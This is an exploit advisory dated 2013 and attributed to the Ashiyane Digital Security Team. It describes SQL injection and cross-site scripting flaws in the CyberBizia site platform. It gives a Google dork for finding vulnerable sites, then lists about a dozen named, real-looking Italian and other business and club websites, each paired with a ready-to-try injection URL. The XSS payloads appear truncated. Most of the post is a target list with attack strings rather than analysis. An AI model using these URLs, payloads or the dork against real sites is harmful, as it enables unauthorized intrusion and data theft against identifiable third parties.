#******************************************************************************** # Exploit Title : CyberBizia Multiple Vulnerabilites # # Software link : http://www.cyberbizia.com # # Exploit Author : Ashiyane Digital Security Team # # Tested on: Windows 7 , Linux # # Google Dork : intext:"Powered by CyberBizia" # # Date: 2013/08/30 # -------------------------------------------------------------------- # Exploit 1 : Sql Injection # # Location : [Target]/myasg/os.asp?elenca=mese&mese=[Sql Injection] # # # Proof: # # http://www.advancedcardiology.it/myasg/os.asp?elenca=mese&mese=1' # # http://www.artielavori.com/myasg/os.asp?elenca=mese&mese=1' # # http://www.basketquartu.it/myasg/os.asp?elenca=mese&mese=1' # # http://www.cdsdonnecagliari.it/myasg/os.asp?elenca=mese&mese=1' # # http://www.digicsoft.it/myasg/os.asp?elenca=mese&mese=1' # # http://www.costiauto.com/myasg/os.asp?elenca=mese&mese=1' # # http://www.cdsdonnecagliari.it/myasg/os.asp?elenca=mese&mese=1' # # http://www.basketquartu.it/myasg/os.asp?elenca=mese&mese=1' # # http://www.immobiliarevacanze.it/myasg/os.asp?elenca=mese&mese=1' # # http://www.magico-web.it/myasg/os.asp?elenca=mese&mese=1' # # http://www.archibaleno.it/myasg/os.asp?elenca=mese&mese=1' -------------------------------------------------------------------- # Exploit 2 : # # Location : [Target]t/?Title=[xss] # # # Proof: # # http://www.advancedcardiology.it/?Title="/> # # http://www.artielavori.com/?Title="/> # # http://www.basketquartu.it/?Title="/> # # http://www.cdsdonnecagliari.it/?Title="/> # # http://www.digicsoft.it/?Title="/> # # http://www.costiauto.com/?Title="/> # # http://www.cdsdonnecagliari.it/?Title="/> # # http://www.basketquartu.it/?Title="/> # # http://www.immobiliarevacanze.it/?Title="/> # # http://www.mozzarellina.com/?Title="/> # # http://www.archibaleno.it/?Title="/> # ###################### discovered by : ACC3SS ######################